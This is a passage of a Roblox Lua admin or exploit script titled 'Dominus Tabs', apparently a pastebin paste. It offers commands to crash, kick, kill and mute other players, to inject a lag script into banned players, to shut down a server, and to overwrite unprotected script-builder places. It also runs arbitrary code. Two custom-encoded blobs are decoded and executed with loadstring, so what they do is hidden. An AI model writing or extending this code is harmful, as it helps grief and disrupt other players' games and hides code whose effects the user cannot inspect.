  940. AddCmd("Crash player","crash","Crash the player",
  941. function(plrs)
  942. for _, plr in pairs(plrs) do
  943. if plr and plr.Backpack then
  944. NewLS([==[
  945. game:GetService("RunService").RenderStepped(function()
  946. Delay(0, function() return end)
  947. end)]==], plr.Backpack)
  948. end
  949. end
  950. end
  951. )
  952.  
  953. AddCmd("Respawn player","respawn","Respawn the player",
  954. function(plrs)
  955. for _, plr in pairs(plrs) do
  956. NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace)
  957. end
  958. end
  959. )
  960.  
  961. AddCmd("Mute player","mute","Block the player chat",
  962. function(plrs)
  963. for _, plr in pairs(plrs) do
  964. if plr and plr.Backpack then
  965. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, false)", plr.Backpack)
  966. end
  967. end
  968. end
  969. )
  970.  
  971. AddCmd("Unmute player","unmute","Unblock the player chat",
  972. function(plrs)
  973. for _, plr in pairs(plrs) do
  974. if plr and plr.Backpack then
  975. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, true)", plr.Backpack)
  976. end
  977. end
  978. end
  979. )
  980.  
  981. AddCmd("Set SkyBox","abox","Skybox A",
  982. function()
  983. function getAll(obj)
  984. for i, v in pairs(obj:getChildren()) do
  985. if v:IsA("BasePart") then
  986. v.Anchored = false
  987. v.BrickColor = BrickColor.new(0)
  988. bv = Instance.new("BodyVelocity")
  989. bv.Parent = v
  990. bv.maxForce = Vector3.new(100000000,100000000,100000000)
  991. local s = Instance.new("SelectionBox")
  992. s.Color = BrickColor.random()
  993. s.Adornee = v
  994. s.Parent = v
  995. s.Transparency = (0.4)
  996. end
  997. getAll(v)
  998. end
  999. end
  1000. getAll(workspace)
  1001. game.Lighting.TimeOfDay = "07:00:00"
  1002. game.Lighting.Ambient = Color3.new(0,0,0)
  1003. sky = Instance.new("Sky")
  1004. sky.Parent = game.Lighting
  1005. sky.SkyboxBk = "http://www.roblox.com/asset/?id=127493466"
  1006. sky.SkyboxDn = "http://www.roblox.com/asset/?id=127493466"
  1007. sky.SkyboxFt = "http://www.roblox.com/asset/?id=127493466"
  1008. sky.SkyboxLf = "http://www.roblox.com/asset/?id=127493466"
  1009. sky.SkyboxRt = "http://www.roblox.com/asset/?id=127493466"
  1010. sky.SkyboxUp = "http://www.roblox.com/asset/?id=127493466"
  1011. end
  1012. )
  1013.  
  1014. AddCmd("Un-ForceField","unff","Remove the forcefield that you gave to player",
  1015. function(plrs)
  1016. for _, plr in pairs(plrs) do
  1017. if plr and plr.Character then
  1018. pcall(function()
  1019. for _,v in pairs(plr.Character:GetChildren()) do
  1020. if v:IsA("ForceField") then
  1021. v:Destroy()
  1022. end
  1023. end
  1024. end)
  1025. end
  1026. end
  1027. end
  1028. )
  1029.  
  1030. AddCmd("Gear","gear","Give gear to player",
  1031. function(plrs, msg)
  1032. local keypos = msg:find(key)
  1033. local targPlayers = msg:sub(1,keypos-1)
  1034. local plrs = getPlayers(targPlayers)
  1035. local asset = msg:sub(tonumber(keypos+1))
  1036. for _,plr in pairs(plrs) do
  1037. if plr and plr.Backpack then
  1038. local obj = game:service("InsertService"):LoadAsset(asset)
  1039. pcall(function()
  1040. for a,g in pairs(obj:children())do
  1041. if g:IsA("Tool") or g:IsA("HopperBin") then
  1042. g.Parent = plr.Backpack
  1043. end
  1044. end
  1045. end)
  1046. end
  1047. end
  1048. end
  1049. )
  1050.  
  1051.  
  1052. AddCmd("God player","god","Make the player immortal",
  1053. function(plrs)
  1054. for _, plr in pairs(plrs) do
  1055. if plr and plr.Character and plr.Character.Humanoid then
  1056. plr.Character.Humanoid.MaxHealth = math.huge
  1057. end
  1058. end
  1059. end
  1060. )
  1061.  
  1062. AddCmd("Fix Lighting","fixl","Fix the Lighting ",
  1063. function()
  1064. function dtr()
  1065. local sk = game.Lighting:findFirstChild("Sky")
  1066. if sk ~= nil then
  1067. sk:Remove()
  1068. end
  1069. game.Lighting.FogEnd = 10011111111
  1070. game.Lighting.Ambient = Color3.new(0.5,0.5,0.5)
  1071. game.Lighting.TimeOfDay = "14:00:00"
  1072. game.Lighting.Ambient = Color3.new(0.5,0.5,0.5)
  1073. game.Lighting.Brightness = 1
  1074. game.Lighting.ColorShift_Bottom = Color3.new(0,0,0)
  1075. game.Lighting.ColorShift_Top = Color3.new(0,0,0)
  1076. game.Lighting.ShadowColor = Color3.new(0.7,0.7,0.7)
  1077. end
  1078.  
  1079. dtr()
  1080.  
  1081. game.Lighting.Changed:connect(dtr)
  1082. end
  1083. )
  1084.  
  1085. AddCmd("Ungod player","ungod","Make the player mortal",
  1086. function(plrs)
  1087. for _, plr in pairs(plrs) do
  1088. if plr and plr.Character then
  1089. plr.Character.Humanoid.MaxHealth = 100
  1090. end
  1091. end
  1092. end
  1093. )
  1094.  
  1095. AddCmd("Night","night","Makes it night",
  1096. function()
  1097. game.Lighting.TimeOfDay = "00:00:00"
  1098. end
  1099. )
  1100.  
  1101. AddCmd("Midnight","midnight","Makes it midnight",
  1102. function()
  1103. game.Lighting.TimeOfDay = "06:00:00"
  1104. end
  1105. )
  1106.  
  1107. AddCmd("Day","day","Makes it day",
  1108. function()
  1109. game.Lighting.TimeOfDay = "12:00:00"
  1110. end
  1111. )
  1112.  
  1113. AddCmd("Kick player","kick","Kick a player",
  1114. function(plrs)
  1115. for _, plr in pairs(plrs) do
  1116. if plr and plr.Backpack then
  1117. NewLS("game:service'StarterGui':SerCoreGuiEnabled(3,false)", plr.Backpack)
  1118. plr:Destroy()
  1119. end
  1120. end
  1121. end
  1122. )
  1123.  
  1124. AddCmd("Kill player","kill","Kill a player",
  1125. function(plrs)
  1126. for _, plr in pairs(plrs) do
  1127. if plr and plr.Character then
  1128. plr.Character:BreakJoints()
  1129. end
  1130. end
  1131. end
  1132. )
  1133.  
  1134. AddCmd("Punish player","punish","Remove character of a player",
  1135. function(plrs)
  1136. for _, plr in pairs(plrs) do
  1137. if plr and plr.Character then
  1138. plr.Character:Destroy()
  1139. end
  1140. end
  1141. end
  1142. )
  1143.  
  1144. AddCmd("Admin a player","bmadmin","Give admin to a player",
  1145. function(plrs)
  1146. for _, plr in pairs(plrs) do
  1147. if plr and plr.Backpack then
  1148. script.Parent = plr.Backpack
  1149. Output("You gave admin to: "..plr.Name, __)
  1150. end
  1151. end
  1152. end
  1153. )
  1154.  
  1155. AddCmd("Fix cam","fcam","Fix anyone's cam",
  1156. function(plrs, msg)
  1157. for _, plr in pairs(plrs) do
  1158. if plr and plr.Backpack then
  1159. NewLS([[
  1160. game.Workspace.CurrentCamera:Destroy()
  1161. cam = Instance.new("Camera", workspace)
  1162. cam.Name = "CurrentCamera"
  1163. cam.FieldOfView = 70
  1164. cam.CameraType = "Custom"
  1165. cam.CameraSubject = game.Players.LocalPlayer.Character.Humanoid]], plr.Backpack)
  1166. end
  1167. end
  1168. end
  1169. )
  1170.  
  1171. local z={["&"]=0,["%"]=1,["="]=2,["!"]=3,["*"]=4,["+"]=5,["?"]=6,["-"]=7,["~"]=8,["#"]=9,["$"]=10,[")"]=11,["^"]=12,["("]=13,["_"]=14,["@"]=15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  1172. "??+-_?!?*-#?@?_?&=!?=-+?%?*-+?!+@?+-_?*?~=#A*#=$&#&!+@?+-_?*?(!#*_?!-*-%?_?!?+?_=_?+?--~A=!+@?+-_?*?==^=-*%?(?+?)+==-+@?=-)?!-&-%?!?+?==(+#=$&#&!+@?+-_?*?)+==_*%?(?+?==(+(!~A=!++?=-?-+?=-@+!+#-!-*-+?(?@+!+@?+-_?*?==#=$&#&!+@?+-_?*?)+==&+#?*-!?~?==(+(!~=%!#=$&#&!+@?+-_?*?)+==!+@?+-_?*?#**?==(+(!~===~?*-*-&-$!@=@=------_==-@?=?^?@?~-_=!?@?(?@=%?!-!-+?*-@=@!#?*?(!==_=_=*-@?_?+-(?=?+?=-~=#***#=#=$&#&!+@?+-_?*?)+==?+@?^?+-(?+?==(+(!~=&!_=+!#=$&#&--%?#?*-~=#=$&#&!+@?+-_?*?$!&+^?%?#-~=#=$&+?_?*?"
  1173. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(z[lo]+z[hi]*16)end)))),getfenv())()
  1174.  
  1175.  
  1176.  
  1177. function CheckForExistingSound()
  1178. for _,Child in pairs(Game["Workspace"]:GetChildren()) do
  1179. if(Child["ClassName"]==("Sound"))then
  1180. Child:Pause()
  1181. Child["PlayOnRemove"]=(false);
  1182. wait()
  1183. Child:Destroy()
  1184. end
  1185. end
  1186. end
  1187.  
  1188. function ShowMusicList()
  1189. Dismiss()
  1190. Output("R3hab & Deorro - Flashlight",function()
  1191. CheckForExistingSound()
  1192. createSound(149197431)
  1193. end)
  1194. Output("Benny Hill Song (Troll Song)",function()
  1195. CheckForExistingSound()
  1196. createSound(162457050)
  1197. end)
  1198. Output("Sikdope - Unicorn Zombie Apocalypse",function()
  1199. CheckForExistingSound()
  1200. createSound(156729838)
  1201. end)
  1202. Output("Martin Garrix - Helicopter",function()
  1203. CheckForExistingSound()
  1204. createSound(144665276)
  1205. end)
  1206. Output("DJ Fresh - Gold Dust",function()
  1207. CheckForExistingSound()
  1208. createSound(143546719)
  1209. end)
  1210. Output("MACKLEMORE - CAN'T HOLD US",function()
  1211. CheckForExistingSound()
  1212. createSound(142373648)
  1213. end)
  1214. Output("Martin Garrix - Animals",function()
  1215. CheckForExistingSound()
  1216. createSound(142370129)
  1217. end)
  1218. Output("Daft Punk - Get Lucky",function()
  1219. CheckForExistingSound()
  1220. createSound(142677206)
  1221. end)
  1222. Output("Redfoo - Let's Get Ridiculous",function()
  1223. CheckForExistingSound()
  1224. createSound(143727189)
  1225. end)
  1226. Output("Disclosure -You & Me ft.Eliza (Flume Remix)",function()
  1227. CheckForExistingSound()
  1228. createSound(157345795)
  1229. end)
  1230. Output("Skrillex - Recess",function()
  1231. CheckForExistingSound()
  1232. createSound(151846965)
  1233. end)
  1234. Output("R3hab & NERVO & Ummet Ozcan - Revolution",function()
  1235. CheckForExistingSound()
  1236. createSound(152771004)
  1237. end)
  1238. Output("Tsunami Hardstyle",function()
  1239. CheckForExistingSound()
  1240. createSound(142720946)
  1241. end)
  1242. Output("Martin Garrix - Wizard",function()
  1243. CheckForExistingSound()
  1244. createSound(142373972)
  1245. end)
  1246. Output("Wiggle Dubstep Remix",function()
  1247. CheckForExistingSound()
  1248. createSound(157492021)
  1249. end)
  1250. Output("NaeNae Song",function()
  1251. CheckForExistingSound()
  1252. createSound(146054931)
  1253. end)
  1254. Output("Troll Song",function()
  1255. CheckForExistingSound()
  1256. createSound(131857877)
  1257. end)
  1258. Output("Turn Down For What",function()
  1259. CheckForExistingSound()
  1260. createSound(132935524)
  1261. end)
  1262. Output("It's Raining Tacos",function()
  1263. CheckForExistingSound()
  1264. createSound(147153756)
  1265. end)
  1266. Output("Showtek - We Like To Party",function()
  1267. CheckForExistingSound()
  1268. createSound(146048136)
  1269. end)
  1270. Output("Everything is Awesome",function()
  1271. CheckForExistingSound()
  1272. createSound(154618552)
  1273. end)
  1274. end
  1275.  
  1276. AddCmd("Musiclist","mlist","Shows the Possible Sounds to Play",
  1277. function()
  1278. ShowMusicList()
  1279. end)
  1280.  
  1281. AddCmd("AFK","afk","Ping yourself as afk",
  1282. function()
  1283. Dismiss()
  1284. for i = 1,8 do
  1285. wait()
  1286. Output("AFK", __)
  1287. end
  1288. end
  1289. )
  1290.  
  1291. AddCmd("Back","back","Ping yourself as back",
  1292. function()
  1293. Dismiss()
  1294. for i = 1,8 do
  1295. wait()
  1296. Output("Back <3", __)
  1297. end
  1298. wait(3)
  1299. Dismiss()
  1300. end
  1301. )
  1302.  
  1303. AddCmd("Ban a player","ban","Kicks a player when he enters",
  1304. function(plrs, msg)
  1305. for _,v in pairs(plrs) do
  1306. if v then
  1307. table.insert(Banlist,v.Name)
  1308. Output('Banned | '..v.Name,__)
  1309. else
  1310. Output(Error)
  1311. end
  1312. end
  1313. end
  1314. )
  1315.  
  1316. local z={["-"]=0,["^"]=1,[")"]=2,["*"]=3,["!"]=4,["="]=5,["?"]=6,["+"]=7,["%"]=8,["#"]=9,["$"]=10,["~"]=11,["_"]=12,["&"]=13,["("]=14,["@"]=15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  1317. "^!!?!?*!&?!?%A)#!(A?@?))_A)#?(A?@?))_A)#!(A?@?-)^!)?@?=+!+-)!=%?#?*+-)^!!?&?#?(?))_)$-??=+(?*?!+#?@?(?-)%)#)$--)-)@!=+!+-+=+!+%A)!=%?#?*+-)^!!?&?#?(?-)#?*+-)&?^?!?=?-))?#+-))!_?^?*?~?*=!+^?)+%=#!#!))_)@=@=#)$--)-)@!=+!+-+=+!+%)))%!^??+=?-)??=+(?-)$*#)))_)@=@=#)$--)-)=?(?!?$-#)"
  1318. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(z[lo]+z[hi]*16)end)))),getfenv())()
  1319.  
  1320. AddCmd("Shutdown the game","sd","Shutdown the game",
  1321. function()
  1322. Output("Shutting down! By Bl3ck M3gic","Really red")
  1323. for k,v in pairs(game:GetService("Players"):GetPlayers()) do v:Destroy() end
  1324. game.Workspace.Terrain:Clear()
  1325. wait(1)
  1326. game.Workspace:ClearAllChildren()
  1327. game:GetService("Players").PlayerAdded:connect(function(p) p:Destroy() end)
  1328. end
  1329. )
  1330.  
  1331. AddCmd("RuinSB","rsb","Ruins a not-saveplace protected scriptbuilder",
  1332. function()
  1333. if SourceName == "source" then
  1334. Output("lel","Really red")
  1335. else
  1336. NewS([[game:SavePlace()]],Workspace)
  1337. end
  1338. end
  1339. )
  1340.  
  1341. AddCmd("Check source","chks","Check if the source is found",
  1342. function()
  1343. if found then
  1344. Output("Source is found")
  1345. else
  1346. Output("Source is not found")
  1347. end
  1348. end
  1349. )
  1350.  
  1351. AddCmd("Say Bye","bye","Byeeee Byeee",
  1352. function()
  1353. Dismiss()
  1354. for i = 1,8 do
  1355. Output("Bye <3", __)
  1356. end
  1357. end
  1358. )
  1359.  
  1360. AddCmd("Check source name","chksn","Check the source name",
  1361. function()
  1362. Output(SourceName, __)
  1363. end
  1364. )
  1365.  
  1366. AddCmd("Change source name","csn","Change the source name",
  1367. function(plrs, msg)
  1368. SourceName = tostring(msg)
  1369. end
  1370. )
  1371.  
  1372. AddCmd("Kick player list","klist", "Show a kick player list",
  1373. function()
  1374. Dismiss()
  1375. Output("Click on the player name that you want to kick", __)
  1376. for _,v in pairs(game:GetService("Players"):GetChildren()) do
  1377. Output(v.Name,
  1378. function()
  1379. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, false)", v.Backpack)
  1380. v:Destroy()
  1381. end)
  1382. end
  1383. end
  1384. )
  1385.  
  1386. AddCmd("Script","script","Execute a Script",
  1387. function(plrs, msg)
  1388. NewS(msg, workspace)
  1389. end
  1390. )
  1391.  
  1392. AddCmd("LocalScript","local","Execute a LocalScript",
  1393. function(plrs, msg)
  1394. NewLS(msg, LocalPlayer.Backpack)
  1395. end
  1396. )
  1397.  
  1398. AddCmd("Execute", "exe","Execute a LocalScript for admin",
  1399. function(plrs, msg)
  1400. a,b = ypcall(function()
  1401. loadstring(msg)()
  1402. end) if not a then Output(b,"Bright red") end
  1403. end
  1404. )
  1405.  
  1406.  
  1407. AddCmd("#Commands","#cmds","See how much are commands in this admin",
  1408. function()
  1409. Output(#Cmds, __)
  1410. end
  1411. )
  1412.  
  1413. AddCmd("Clean workspace","clean","Clean everything in workspace except terrain",
  1414. function()
  1415. for i,s in pairs(workspace:GetChildren()) do
  1416. if game:GetService("Players"):GetPlayerFromCharacter(s) == nil then
  1417. if s.className ~= "Terrain" then
  1418. if s.className ~= "Camera" then
  1419. pcall(function() s:Destroy() end)
  1420. end end end end
  1421. local b = Instance.new("Part", Game:GetService("Workspace"))
  1422. b.Size = Vector3.new(3000, 1, 3000)
  1423. b.CFrame = CFrame.new(0, 0, 0)
  1424. b.Name = "Base"
  1425. b.BrickColor = BrickColor.new("Earth green")
  1426. b.TopSurface = "Smooth"
  1427. b.BottomSurface = "Smooth"
  1428. b.LeftSurface = "Smooth"
  1429. b.RightSurface = "Smooth"
  1430. b.FrontSurface = "Smooth"
  1431. b.BackSurface = "Smooth"
  1432. b.Anchored = true
  1433. b.Locked = true
  1434. local sl = Instance.new("SpawnLocation", workspace)
  1435. sl.Anchored = true
  1436. sl.Locked = true
  1437. sl.formFactor = "Plate"
  1438. sl.Size = Vector3.new(6, 0.4, 6)
  1439. sl.CFrame = CFrame.new(0, 0.6, 0)
  1440. sl.BrickColor = BrickColor.new("Really red")
  1441. sl.TopSurface = "Smooth"
  1442. sl.BottomSurface = "Smooth"
  1443. sl.LeftSurface = "Smooth"
  1444. sl.RightSurface = "Smooth"
  1445. sl.FrontSurface = "Smooth"
  1446. sl.BackSurface = "Smooth"
  1447. game.Lighting.FogEnd = 10011111111
  1448. game.Lighting.Ambient = Color3.new(0.5,0.5,0.5)
  1449. game.Lighting.TimeOfDay = "14:00:00"
  1450. game.Lighting.Ambient = Color3.new(0.5,0.5,0.5)
  1451. game.Lighting.Brightness = 1
  1452. game.Lighting.ColorShift_Bottom = Color3.new(0,0,0)
  1453. game.Lighting.ColorShift_Top = Color3.new(0,0,0)
  1454. game.Lighting.ShadowColor = Color3.new(0.7,0.7,0.7)
  1455. end
  1456. )
  1457.  
  1458. AddCmd("Script Help","sh","Help everyone with scripts",
  1459. function()
  1460. Dismiss()
  1461. for i = 1,1 do
  1462. wait()
  1463. Output("Script Help;", __)
  1464. Output("Download Scriptbot", __)
  1465. Output("Dont know the link? Go on YouTube", __)
  1466. Output("I cant do more for you :)", __)
  1467. end
  1468. end
  1469. )
  1470.  
  1471. AddCmd("AirStrike","airstrike","Gives AirStrike",
  1472. function()
  1473. Dismiss()
  1474. for i = 1,1 do
  1475. local obj = game:service("InsertService"):LoadAsset(88885539)
  1476. for a,g in pairs(obj:children()) do if g:IsA("Tool") or g:IsA("HopperBin") then g.Parent = LocalPlayer.Backpack end end
  1477. end
  1478. end
  1479. )
  1480.  
  1481. AddCmd("Dark Character","dark","Make Character Dark",
  1482. function()
  1483. Dismiss()
  1484. for i = 1,1 do
  1485. Output("Character is Now Dark",__)
  1486. player=game.Players.LocalPlayer
  1487. char=player.Character
  1488. Color=BrickColor.new("Grey")
  1489. Color2=BrickColor.new(Color3.new(0,0,0))
  1490. model=Instance.new("Model")
  1491. model.Name="Suit"
  1492. model.Parent=char
  1493. d=0
  1494. Debounce=true
  1495. fake=char.Head:clone()
  1496. pcall(function() fake.face:remove() end)
  1497. char.Head.Transparency=1
  1498. fake.Parent=model
  1499. fake.Transparency=0
  1500. w=Instance.new("Weld")
  1501. w.Part1=fake
  1502. w.Part0=char.Head
  1503. w.Parent=char
  1504. fake.Mesh.Scale=fake.Mesh.Scale+Vector3.new(-0.01,-0.01,-0.01)
  1505. fake.BrickColor=Color2
  1506. char.Head.Changed:connect(function(p)
  1507. if p=="BrickColor" then
  1508. wait()
  1509. pcall(function()
  1510. char.Head.face:Remove()
  1511. char.Torso.roblox:remove()
  1512. char["Shirt Graphic"]:remove()
  1513. end)
  1514. char.Humanoid.WalkSpeed=25
  1515. char.Humanoid.MaxHealth=math.huge
  1516. char.Humanoid.Health=math.huge
  1517. for _,v in pairs(char:children()) do
  1518. if v.className=="Hat" then
  1519. v:remove()
  1520. elseif v:IsA("Part") then
  1521. v.BrickColor=Color2
  1522. v.TopSurface="Smooth"
  1523. v.BottomSurface="Smooth"
  1524. elseif v:IsA("Shirt") or v:IsA("Pants") then
  1525. v:remove()
  1526. end
  1527. end
  1528. end
  1529. end)
  1530. char.Head.BrickColor=Color2
  1531. Tor=Instance.new("Part")
  1532. Tor.Size=Vector3.new(1,1,1)
  1533. Tor.BrickColor=Color2
  1534. Tor.Reflectance=0
  1535. Tor.Transparency=0
  1536. Tor.CanCollide=false
  1537. Tor.Parent=char
  1538. Mesh=Instance.new("SpecialMesh")
  1539. Mesh.MeshId="http://www.roblox.com/asset/?id=21057410"
  1540. Mesh.Scale=Vector3.new(1.05,1.05,1.05)
  1541. Mesh.Parent=Tor
  1542. w = Instance.new("Weld")
  1543. w.Parent = char["Head"]
  1544. w.Part0 = w.Parent
  1545. w.Part1 = Tor
  1546. w.C0 = CFrame.new(0,0.35,0)
  1547. end
  1548. end
  1549. )
  1550.  
  1551. AddCmd("Noclip Character","noclip","Make Character Noclip",
  1552. function()
  1553. Dismiss()
  1554. for i = 1,1 do
  1555. Output("Character is now noclipped",__)
  1556. wait(1)
  1557.  
  1558. nam = game.Players.LocalPlayer.Name
  1559.  
  1560. coroutine.wrap(function()
  1561. while wait() do
  1562. for a, b in pairs(Workspace[nam]:GetChildren()) do
  1563. if b:FindFirstChild('Handle') then
  1564. b.Handle.CanCollide = false
  1565. end
  1566. end
  1567. end
  1568. end)()
  1569.  
  1570. Workspace[nam].Humanoid.Changed:connect(function()
  1571. Workspace[nam].Humanoid.WalkSpeed = 16
  1572. end)
  1573.  
  1574. game:GetService('Players').LocalPlayer.PlayerGui.ChildAdded:connect(function(asd)
  1575. delay(0, function()
  1576. if asd.Name ~= 'OutputGUI' then
  1577. asd:Destroy()
  1578. end
  1579. end)
  1580. end)
  1581.  
  1582. game:GetService('RunService').Stepped:connect(function()
  1583. Workspace[nam].Torso.CanCollide = false
  1584. Workspace[nam].Head.CanCollide = false
  1585. end)
  1586.  
  1587. Workspace[nam].Torso.Changed:connect(function()
  1588. Workspace[nam].Torso.CanCollide = false
  1589. Workspace[nam].Head.CanCollide = false
  1590. end)
  1591. end end
  1592. )
  1593.  
  1594. AddCmd("Remove Tools","rt","Remove current tools",
  1595. function()
  1596. Dismiss()
  1597. pcall(function()
  1598. LocalPlayer.Backpack:ClearAllChildren()
  1599. end)
  1600. end
  1601. )
  1602.  
  1603. function Output(Txt,func)
  1604. P=Instance.new("Part",tabmodel)
  1605. P.Shape=("Ball")
  1606. P.Anchored=true
  1607. P.CanCollide=false
  1608. if probemode==false then
  1609. if LocalPlayer.Character.Torso then
  1610. P.Position=LocalPlayer.Character.Torso.Position
  1611. elseif LocalPlayer.Character.Torso==nil then return end
  1612. elseif probemode==true then
  1613. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  1614. P.Position=game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe").Position
  1615. elseif game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe")==nil then return end
  1616. else
  1617. return
  1618. end
  1619. M=Instance.new("SpecialMesh",P)
  1620. M.MeshId=("http://www.roblox.com/asset/?id=21057410")
  1621. M.TextureId=("http://www.roblox.com/asset/?id=21243140")
  1622. M.Scale=Vector3.new(2,2,2)
  1623. Instance.new("PointLight",P)
  1624. bg=Instance.new("BillboardGui",P)
  1625. bg.Adornee=tab
  1626. bg.Size=UDim2.new(8,0,7.5,0)
  1627. bg.StudsOffset=Vector3.new(0,1,0)
  1628. text=Instance.new("TextLabel",bg)
  1629. text.Size=UDim2.new(1,0,0.2,0)
  1630. text.FontSize=("Size18")
  1631. text.BackgroundTransparency=1
  1632. text.Font=("Legacy")
  1633. text.TextStrokeTransparency=0
  1634. text.TextColor=BrickColor.new("Institutional white")
  1635. text.Text=Txt
  1636. Click=Instance.new("ClickDetector",P)
  1637. Click.MaxActivationDistance=(math.huge)
  1638. Click.MouseClick:connect(function(Plr)
  1639. if Plr.Name==LocalPlayer.Name then
  1640. Dismiss()
  1641. if func~=nil then
  1642. func=func
  1643. func()
  1644. end
  1645. end
  1646. end)
  1647. table.insert(Tabs,P)
  1648. end
  1649.  
  1650. function getPlayers(msg)
  1651. local plrs = {}
  1652. if msg == "me" then
  1653. table.insert(plrs, LocalPlayer)
  1654. elseif msg == "all" then
  1655. plrs = game:GetService("Players"):GetChildren()
  1656. elseif msg == "noobs" then
  1657. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  1658. if plr.AccountAge > 364 then
  1659. table.insert(plrs, plr)
  1660. end
  1661. end
  1662. elseif msg == "veterans" then
  1663. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  1664. if plr.AccountAge > 364 then
  1665. table.insert(plrs, plr)
  1666. end
  1667. end
  1668. elseif msg == "others" then
  1669. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  1670. if v ~= LocalPlayer then
  1671. table.insert(plrs, v)
  1672. end
  1673. end
  1674. else
  1675. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  1676. if v.Name:lower():sub(1,#msg) == msg:lower() then
  1677. table.insert(plrs, v)
  1678. end
  1679. end
  1680. end
  1681. return plrs
  1682. end
  1683.  
  1684. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  1685. end
  1686.  
  1687. LocalPlayer.Chatted:connect(function(m)
  1688. for i,v in pairs(Cmds) do
  1689. if v["Say"]..key == m:sub(1, #v["Say"]+#key) then
  1690. v["Func"](getPlayers(m:sub(#v["Say"]+#key+1)), m:sub(#v["Say"]+#key+1))
  1691. end
  1692. end
  1693. end)
  1694.  
  1695. for i = 0,8,1 do
  1696. wait(0.01)
  1697. end
  1698. Output("Welcome to Dominus Tabs!,", __)
  1699. Output("Updated by V3RMlll0N,", __)
  1700. Output("Dont abuse please", __)
  1701. Output("Status; Private", __)
  1702. Output("A cmd not working? Message me", __)
  1703. Output("User: "..LocalPlayer.Name, __)
  1704.  
  1705. tabmodeldebounce = false
  1706. modeldebounce = false
  1707. game:service'RunService'.Stepped:connect(function()
  1708. if modeldebounce then return end
  1709. rot = (rot % 100) + 0.5
  1710. if tabmodel.Parent ~= workspace then
  1711. modeldebounce = true
  1712. tabs = {}
  1713. tabmodel = Instance.new("Model", workspace)
  1714. tabmodel.Name = "Tablets"
  1715. tabs = {}
  1716. wait()
  1717. modeldebounce = false
  1718. end
  1719. end)
  1720.  
  1721. rot = 0
  1722. coroutine.resume(coroutine.create(function()
  1723. game:GetService("RunService").Stepped:connect(function()
  1724. if probemode == false then
  1725. if LocalPlayer.Character then
  1726. if LocalPlayer.Character:findFirstChild("Torso") then
  1727. rot = rot + 0.0001
  1728. for i,v in pairs(Tabs) do
  1729. ypcall(function()
  1730. local pos = LocalPlayer.Character.Torso.CFrame
  1731. local radius = 4 + (#Tabs * 0.5)
  1732. local x = math.sin((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1733. local y = 0
  1734. local z = math.cos((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1735. local arot = Vector3.new(x, y, z) + pos.p
  1736. local brot = v.CFrame.p
  1737. local crot = (arot * .1 + brot * .9)
  1738. v.CFrame = CFrame.new(crot, pos.p)
  1739. end)
  1740. end
  1741. end
  1742. end
  1743. end
  1744. if probemode == true then
  1745. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  1746. rot = rot + 0.0001
  1747. for i,v in pairs(Tabs) do
  1748. ypcall(function()
  1749. local pos = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe").CFrame
  1750. local radius = 4 + (#Tabs * 0.5)
  1751. local x = math.sin((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1752. local y = 0
  1753. local z = math.cos((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1754. local arot = Vector3.new(x, y, z) + pos.p
  1755. local brot = v.CFrame.p
  1756. local crot = (arot * .1 + brot * .9)
  1757. v.CFrame = CFrame.new(crot, pos.p)
  1758. end)
  1759. end
  1760. end
  1761. end
  1762. end)
  1763. end))
  1764.  
  1765. Game["Players"].PlayerAdded:connect(function(newPlr)
  1766. for _,BannedPlr in pairs(Banlist) do
  1767. if(newPlr["Name"]==BannedPlr)then
  1768. if(newPlr["Name"]~=("iLordVex"))then
  1769. newPlr:WaitForChild("Backpack")
  1770. NewLS(LagSource,newPlr["Backpack"])
  1771. Output("The Banned Player ["..newPlr["Name"].."] has Tried to Enter the Server",__)
  1772. end
  1773. elseif(newPlr["Name"]~=BannedPlr)then
  1774. Output("["..newPlr["Name"].."] has Entered the Server.",__)
  1775. end
  1776. end
  1777. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement